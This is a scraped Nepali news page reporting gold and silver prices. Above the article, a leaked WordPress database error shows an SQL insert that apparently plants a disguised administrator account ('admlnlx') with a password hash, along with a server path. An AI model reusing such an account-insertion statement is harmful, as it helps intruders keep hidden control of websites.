WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B..jCIqOskY0YBghLdIr2Y4JV/J/YY1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-01 09:23:01', '', 'admlnlx', 'admlnlx')


Warning: Trying to access array offset on value of type bool in /home/gaulekhabar.com/public_html/wp-content/themes/nepali-news-portal/header.php on line 21
मंगलबारको कारोबारमा सुनको मूल्य स्थिर, यस्तो छ कारोबार मूल्य – Gaule Khabar

मंगलबारको कारोबारमा सुनको मूल्य स्थिर, यस्तो छ कारोबार मूल्य

मंगलबारको कारोबारमा सुनको मूल्य स्थिर, यस्तो छ कारोबार मूल्य

काठमाडौं,पुस ५-

साताको तेस्रो दिन सोमबार सुनको मूल्य स्थिर छ भने चाँदीको घटेको छ। सोमबार  प्रति तोला ५२ हजारमा कारोबार भएको छापावाल सुन आज पनि सोहि मुल्यमा कारोबार भईरहेको छ। त्यस्तै तेजावी सुन प्रति तोला ५१ हजार ७  सय ५० रुपैयाँमा कारोबार भैरहेको छ।  चांदी तोलामा ५ रुपियाँले घटेर   प्रति तोला ७ सय ५५ रुपैयाँमा कारोबार भईरहेको छ।

नेपाल सुनचाँदी ब्यबसायी महासंघले मंगलबारको कारोबारमा प्रति १० ग्राम छापावाल सुनको मूल्य ४४ हजार ५  सय ८० रुपियाँ तोकेको छ भने प्रति १० ग्राम तेजाबी सुनको मूल्य ४४ हजार ३   सय ६५ तोकेको छ । चाँदी प्रति १० ग्राम ६ सय ४७  रुपियाँ ५० पैसामा कारोबार भई रहेको छ ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका